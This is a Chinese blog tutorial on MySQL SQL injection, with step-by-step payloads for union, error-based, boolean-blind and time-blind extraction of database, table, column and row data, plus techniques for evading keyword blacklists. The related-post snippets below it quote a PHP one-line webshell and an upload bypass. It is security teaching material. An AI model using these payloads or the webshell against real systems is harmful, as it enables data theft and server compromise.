SQL注入原理及步骤以及黑名单绕过方式

已于 2024-04-02 06:53:07 修改
阅读量1.8k 收藏 12
点赞数 27
CC 4.0 BY-SA版权
分类专栏: sql注入 文章标签: sql web安全 网络安全
于 2024-04-01 19:58:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/lxz021202/article/details/137216928
本文详细介绍了在MySQL5.0及以上版本中,如何通过information_schema数据库进行SQL注入检测,包括判断列数、选择注入方式(如联合、报错、布尔、时间盲注)、获取敏感信息以及各种绕过方法,如空格、大小写、关键字和函数名绕过等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原理

mysql5.0以上的版本存在一个information_schema数据库,information_schema数据库包含3个表如下:

步骤

判断是否存在sql注入:

分别输入不同的id值:

——有结果:1’and 1=1#

——无结果:1’and 1=2#

——出错:1'

——正常:1''(两个单引号)

换成双引号同理。

判断查询结果有多少列:

——1’order by 1#(不报错)

——1’order by 2#(不报错)

——1’order by 3#(不报错)

——1’order by 4#(报错)

——这就说明结果有3列。

选择注入方式:

联合注入(union)、报错注入(extractvalue、updatexml)、布尔盲注(当回显只能判断对错的时候用)、时间盲注(布尔盲注的升级版,没有回显或者回显判断不了对错的时候用,根据页面的反馈时间来判断对错)。

获取数据库名:

联合注入:-1’union select 1,database(),3#

报错注入:'and extractvalue(1,concat(0x7e,(select database()),0x7e))--+

布尔盲注:1' and ascii(substr((select database()),1,1))=115--+

时间盲注:1' and if(ascii(substr((select database()),1,1))=115,sleep(3),1)--+

获取表名:

-1’union select 1,(select table_name from information_schema.tables where table_schema=’数据库名’limit 0,1),3#

也可以不用limit,表示从哪一列开始,取多少列。

获取列名:

-1’union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=’数据库名’ and table_name=’表名’),3#

获取列中数据:

-1’ union select 1,(select 列名 from 表名 limit 0,1),3#

黑名单绕过

空格绕过:

/**/(/的url编码为%2f,*的url编码为%2a)

() ——例如:select(1),2,3;(括号的url编码为%28、%29)

回车(url编码为%0a)

`(url编码为%60)

tab(url编码为%09(水平)、%0b(垂直))

大小写绕过

双写关键字绕过

绕过and和or和=:

and可以用%26%26替代,也可以用&&表示。

or可以用||表示。

=可以用like代替。

函数名绕过:

sleep()可以改为benchmark()。

ascii()可以改为ord()。

逗号绕过:

select substr('abc',1,1);

可以改为:select substr('abc' from 1 for 1);

select 1,2,3;

可以改为:select * from (select 1)a join (select 2)b join (select 3)c;

select * from users limit 0,1;

可以改为:select * from users limit 1 offset 0;

23-5 绕过去除 union 和 select 的 SQL 注入
weixin_43263566的博客
02-07 1305
在MySQL中,默认情况下,数据库名、表名在Unix、Linux系统上是区分大小写的,而在Windows系统上则不区分大小写。但是,SQL语句中的关键字(如SELECT、INSERT)、函数名(如MAX()、COUNT())以及列名和别名通常是不区分大小写的。但是,对于字符串值的比较,默认是区分大小写的。下面,我将简要介绍一些MySQL的基础知识,以及您提到的一些特殊编码和替换技巧。在某些安全性较低的应用场景中,攻击者可能会尝试通过改变查询语句的格式来绕过安全过滤器,执行SQL注入等恶意操作。
WAF 规则绕过绕过终极指南:从 SQL 注入到高级编码技术(3.21 更新)
最新发布
浩策盾悟
01-27 1万+
测试最新版本的WAF可以完美绕过。这个需要mysql版本大于5.00.00。/*|%23--%23|*/ 注释符号 *|%23--%23|* 干扰符号。在mysql中这个不是注释,而是取消注释的内容。这个方法也可以部分绕过最新版本的WAF。/包含关键词进行绕过。用一些特殊字符代替空格,特殊字符拼接绕过waf。Mysql 内置得方法。Waf触发规则的绕过
安全】P 2-18 绕过剔除黑名单(union和select)的SQL注入
Z_David_Z的博客
02-15 779
目录0X01 基础知识介绍0X02 去除(union)的代码分析0X03 绕过去除(union)的sql注入0X04 sqlmap安全检测 0X01 基础知识介绍 1、Mysql中的大小写不敏感,大写与小写一样。 2、Mysql 中的十六进制与URL编码通过解码识别。 3、符号和关键字替换 and – &&、or – ||。 4、空格使用 %20表示、%0a换行 %09 tab 0X02 去除(union)的代码分析 preg_replace(mixed $pattern , mixed
记一次奇葩的sql注入联合查询黑名单绕过与布尔盲注绕过
weixin_48421613的博客
10-27 4768
近日为甲方爸爸挖漏洞,又是遇到奇葩SQL注入的一天。 首先,页面是这个样子滴 注意两个蓝色的框 一个小单引号之后,报错了,好样的,sql注入无疑了 由于是Get型注入,所以一开始想直接用union联合查询 使用二分法得知,字段数量是9 2. 使用联合查询,这里被拦住了 代码君已私奔到月球,这是啥玩意? 一开始以为是最常见的 union select 联合查询黑名单过滤,于是乎使用了大部分的方式都是对这两个单次进行绕过,什么大小写、双拼、编码转换,这里要说的是, /**/ 这种的也会被屏蔽 而后
sql注入黑名单绕过漏洞分析
若有战,召必回
10-25 1051
分析:该方法对参数进行非空判断,之后将我们的SQL_REGEX常量以|分割开来赋值给sqlKeywords数组,接着就是对数组依次遍历查看参数中是否存在数组中的相关字符串,若存在就会抛出异常。上面是我们的常量,我们发现对我们大部分的sql注入的敏感内容进行了限制,但是可以利用可根据MySQL的特性绕过,像使用/**/注释符我们可以利用这个来绕过滤。目前的最新版本是v4.7.9,我们发现在最新版本的黑名单中增加了like和*/,那么我们上面的poc就打不通了。
黑名单绕过
qq_53365842的博客
04-20 955
在很多时候有限制文件上传的类型,而黑名单ban了很多相关的后缀,如果没有警用.htaccee那么就能触发getshell .htaccess可以把.jpg解析成php AddType application/x-httpd-php .jpg 先上传.htaccess文件,但是要修改后缀来绕过前端验证,在通过抓包修改回来 再上传jpg的文件,其实是将php一句话木马的文件改为jpg后缀 PHP: <?php @eval($_POST['404']);?> 用蚁剑连接 http
绕过黑名单验证
白菜执笔人的博客
03-05 3521
Web安全攻防 学习笔记 一、绕过黑名单验证(基本都用到 BurpSuite) 1.1、基于文件后缀名验证         对于文件上传模块来说,尽量避免上传可执行的脚本文件。为了防止上传脚本需要设置对应的验证 方式。最简单的就是设置文件后缀名验证。 验证方式的分类 (1)基于白名单验证:只针对白名单中有的后缀名,文件才能上传成功。 (2)基于黑名单...
SQL注入原理步骤以及黑名单绕过方式_java sql注入黑名单绕过
2401_84970145的博客
05-13 1477
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
2024年网络安全最新【Web安全SQL各类注入绕过
2401_84281648的博客
05-03 711
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
ASP.NET防止SQL注入的方法示例
01-20
定期进行代码审计,使用最新的安全最佳实践,并及时修复已知的安全漏洞,这些都是防止SQL注入和其他安全问题的重要步骤。此外,定期更新和学习关于ASP.NET安全的知识,如了解新的攻击手段和防御策略,可以帮助提高...
SQL注入-绕过篇】
m0_62373986的博客
08-29 1769
绕过\的关键点在于网站在对输入数据进行处理时,只进行了一次URL编码,所以将%25转化成%后,不会再检查后面的%27。1、宽字节注入在上一篇博客讲到,是因%df+%5c结合为一个宽字节因为GBK编码组合成一个汉字,从而使\失效。2、除此之外,若\没有被网站过滤,也可以利用\对字符的转义来进行SQL注入。网站初次检测用户输入%2527,因为URL编码将%25转化成%,此时用户输入未检测到特殊字符,直接将%27输入到数据库中。2、若\没有被过滤,使用\令闭合符失效。1、宽字节绕过(%df%5c)
黑名单绕过学习
qq_55515447的博客
11-13 1046
黑名单绕过的方法不止上面提到的几种,当然实际环境中也不会是仅一种检测方式,基本都是很多种方法嵌套使用,所以我们要先进行信息收集,确定好靶机的操作系统、服务器,根据实际情况选择绕过方法。如upload-labs的的pass-03// 初始化上传状态为 false,表示尚未上传成功// 初始化消息变量为 null,用于存储错误信息或成功信息// 检查是否提交了表单// 检查上传目录是否存在// 定义不允许上传的文件扩展名// 获取上传文件的名称并去除首尾空格。
文件上传之黑名单绕过
2301_79299101的博客
11-08 1332
上传的文件后缀名在列表内禁止上传。6,. 利用 windows 环境的叠加特征绕过上传:在 windwos 中如果上传文件名 moonsec.php:.jpg 的时候,会在目录下生产空白的文件名 moonsec.php 再利用 php 和 windows 环境的叠加属性, 以下符号在正则匹配时相等 双引号" 等于 点号. 大于符号> 等于 问号?7, 在上传模块,有的代码会把黑名单的后缀名替换成空,例如a.php 会把php 替换成空,但是可以使用双写绕过例如 asaspp,pphphp,即可绕过上传。
SQL注入
WX公众号-小白学安全
03-31 930
SQL注入概述 SQLSQL(Structured Query Language) – 结构化查询语句 ​ 用途:用于存取数据以及查询、更新和管理关系数据库系统 什么是SQL注入? ​ SQL注入是服务器端未严格校验客户端发送的数据,而导致服务器端SQL语句被恶意修改并成功执行的行为 本质:把用户输入的数据当作代码执行 注入产生原因 代码对带入SQL语句的参数过滤不严格 未启用框架的安全配置。例如:PHP的magic_quotes_gpc 未使用框架安全的查询方法 测试接口未删除 未启用防火墙 未使
SQL注入实战:绕过操作
ting_liang的博客
01-27 3356
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
黑名单文件上传绕过
SoulCat
10-24 1585
黑名单文件上传绕过 我在西北,一山又一山。与你相隔,一关又一关。 漏洞概述: .htaccess用于Apache .user.ini用于php 漏洞复现: .user.ini 原理: .user.ini将所有php文件自动包含任意木马文件执行。 使用条件: 只要以cgi/FastCGI/fpm模式运行的php,并且上传目录下要有正常可执行的php文件,都可以成功包含 上传1.user....
27-4 文件上传漏洞 - 黑名单绕过
weixin_43263566的博客
03-18 898
可以将php文件的后缀改成上述的其他可用后缀名如:php2、php3、....,但是这种方式有个前提需要配置靶场的服务器,才能让服务器将这种后缀名识别为php,所以我感觉这种绕过方式不是很实用,这里使用 .htaccess文件来绕过。尝试上传这个带有不合法后缀名的文件,如果可以正常上传,则说明目标系统的后台可能存在黑名单绕过或者未进行绕过处理;上传成功后我们就可以将我们要上传到靶场中的php文件改名为 4.png 之后我们就可以操作这个文件,我这里上传php一句话马的文件,后面使用蚁剑连接。
文件上传--3黑名单绕过
技术骨干小李的博客
07-29 1521
介绍一下文件上传漏洞中,黑名单绕过
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

“Script Kid”

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值